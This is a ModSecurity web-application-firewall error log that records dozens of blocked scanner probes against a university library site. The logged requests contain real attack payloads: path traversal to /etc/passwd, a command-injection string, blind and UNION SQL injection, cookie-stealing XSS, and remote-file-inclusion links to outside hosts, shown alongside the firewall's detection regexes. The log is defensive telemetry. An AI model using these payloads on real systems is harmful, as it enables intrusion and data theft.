[Tue Aug 29 11:40:59.353546 2023] [:error] [pid 1548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gsimh9t7qaic47.oast.site found within TX:1: cjmnbitjmimt14dgn26gsimh9t7qaic47.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/DnnImageHandler.ashx"] [unique_id "ZO1228Co-f0AAAYMWTIAAAAR"]
[Tue Aug 29 11:40:59.417003 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:pl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:pl: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/mail-masta/inc/lists/csvexport.php"] [unique_id "ZO1228Co-f0AAAcoNN0AAAAF"]
[Tue Aug 29 11:41:00.363591 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:url: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/photoalbum/index.php"] [unique_id "ZO123MCo-f0AAAcbSBoAAAAv"]
[Tue Aug 29 11:41:00.386538 2023] [:error] [pid 1841] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:content: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/default/en_US/frame.html"] [unique_id "ZO123MCo-f0AAAcxbCcAAAAL"]
[Tue Aug 29 11:41:00.446820 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file_name: ../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/webui/"] [unique_id "ZO123MCo-f0AAAcbSB4AAAAv"]
[Tue Aug 29 11:41:01.589615 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:UPusername. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:UPusername: \\x22><script>javascript:alert(document.cookie)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/MUP/"] [unique_id "ZO123cCo-f0AAAcvBdMAAAAJ"]
[Tue Aug 29 11:41:01.641299 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO123cCo-f0AAAaZ9mEAAAAo"]
[Tue Aug 29 11:41:01.658588 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sidebar. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:sidebar: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/default/en_US/frame.A100.html"] [unique_id "ZO123cCo-f0AAAcYU8EAAAAp"]
[Tue Aug 29 11:41:03.583482 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/searchblox/servlet/FileServlet"] [unique_id "ZO1238Co-f0AAActbGsAAAAH"]
[Tue Aug 29 11:41:03.624268 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:firstname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:firstname: test' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/contactus.php"] [unique_id "ZO1238Co-f0AAAcYU8sAAAAp"]
[Tue Aug 29 11:41:04.361185 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:userPage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:userPage: javascript:alert(1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "digilibft.unla.ac.id"] [uri "/CFIDE/debug/cf_debugFr.cfm"] [unique_id "ZO124MCo-f0AAAcYU80AAAAp"]
[Tue Aug 29 11:41:04.451183 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cat_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cat_id: ${system(cat/etc/passwd)}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/infusions/downloads/downloads.php"] [unique_id "ZO124MCo-f0AAActbHEAAAAH"]
[Tue Aug 29 11:41:05.361139 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/catalog.php"] [unique_id "ZO124cCo-f0AAAcqJHwAAAAG"]
[Tue Aug 29 11:41:05.488923 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:s_Language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:s_Language: ../../../../../../../../../../../../../../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/language/lang"] [unique_id "ZO124cCo-f0AAAcsLE0AAAAE"]
[Tue Aug 29 11:41:05.515162 2023] [:error] [pid 1548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{"Type":"SubscriptionConfirmation","Message":"","SubscribeURL":"https://rfi.nessus.org/rfi.txt"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS_NAMES:{\\x22Type\\x22:\\x22SubscriptionConfirmation\\x22,\\x22Message\\x22:\\x22\\x22,\\x22SubscribeURL\\x22:\\x22https://rfi.nessus.org/rfi.txt\\x22}: {\\x22Type\\x22:\\x22SubscriptionConfirmation\\x22,\\x22Message\\x22:\\x22\\x22,\\x22SubscribeURL\\x22:\\x22https://rfi.nessus.org/rfi.txt\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/w3-total-cache/pub/sns.php"] [unique_id "ZO124cCo-f0AAAYMWVYAAAAR"]
[Tue Aug 29 11:41:05.528403 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:userPage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:userPage: javascript:alert(1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "digilibft.unla.ac.id"] [uri "/cfusion/debug/cf_debugFr.cfm"] [unique_id "ZO124cCo-f0AAAcsLE8AAAAE"]
[Tue Aug 29 11:41:08.448171 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:wp_abspath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:wp_abspath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/simple-fields/simple_fields.php"] [unique_id "ZO125MCo-f0AAAcYU-YAAAAp"]
[Tue Aug 29 11:41:09.267124 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:sponsor. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:sponsor: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.dhtml"] [unique_id "ZO125cCo-f0AAAc4Ei4AAAAP"]
[Tue Aug 29 11:41:09.649493 2023] [:error] [pid 1843] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:controller: ../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO125cCo-f0AAAczXekAAAAL"]
[Tue Aug 29 11:41:10.373720 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:email: 2UdyWmaXpTq91nUrOZ0geHP3XoU@test.com' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/contactus.php"] [unique_id "ZO125sCo-f0AAAc0NZ4AAAAM"]
[Tue Aug 29 11:41:10.447473 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:csftyp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:csftyp: classic ssfile1=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/cgi-bin/broker"] [unique_id "ZO125sCo-f0AAAcoNSgAAAAF"]
[Tue Aug 29 11:41:13.426046 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:certfile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:certfile: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/admin/cert_download.php"] [unique_id "ZO126cCo-f0AAAcoNTwAAAAF"]
[Tue Aug 29 11:41:15.479384 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:previewFilePath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:previewFilePath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/analytics/saw.dll"] [unique_id "ZO1268Co-f0AAAc4ElQAAAAP"]
[Tue Aug 29 11:41:18.491905 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:id: -6' union select 1,md5('999999999'),3,4,5,6,7,8,9,10,11-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/admin/"] [unique_id "ZO127sCo-f0AAAYf-QgAAAAD"]
[Tue Aug 29 11:41:18.652701 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:fileName: ../../../../../../../../../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/register/toDownload.do"] [unique_id "ZO127sCo-f0AAActbLEAAAAH"]
[Tue Aug 29 11:41:19.355879 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:err. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:err: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/webshell4/login.php"] [unique_id "ZO1278Co-f0AAAcbSEQAAAAv"]
[Tue Aug 29 11:41:19.439944 2023] [:error] [pid 1846] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:filename: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/ACSServer/WebServlet"] [unique_id "ZO1278Co-f0AAAc2dQoAAAAN"]
[Tue Aug 29 11:41:19.487184 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:fileName: ../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/register/toDownload.do"] [unique_id "ZO1278Co-f0AAAc4EmYAAAAP"]
[Tue Aug 29 11:41:20.393709 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:file: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/compress.php"] [unique_id "ZO128MCo-f0AAAc4EmgAAAAP"]
[Tue Aug 29 11:41:20.428702 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:login: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/webshell4/login.php"] [unique_id "ZO128MCo-f0AAAcqJMcAAAAG"]
[Tue Aug 29 11:41:20.448529 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://test found within TX:1: test"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/oauth/authorize"] [unique_id "ZO128MCo-f0AAAaZ9q8AAAAo"]
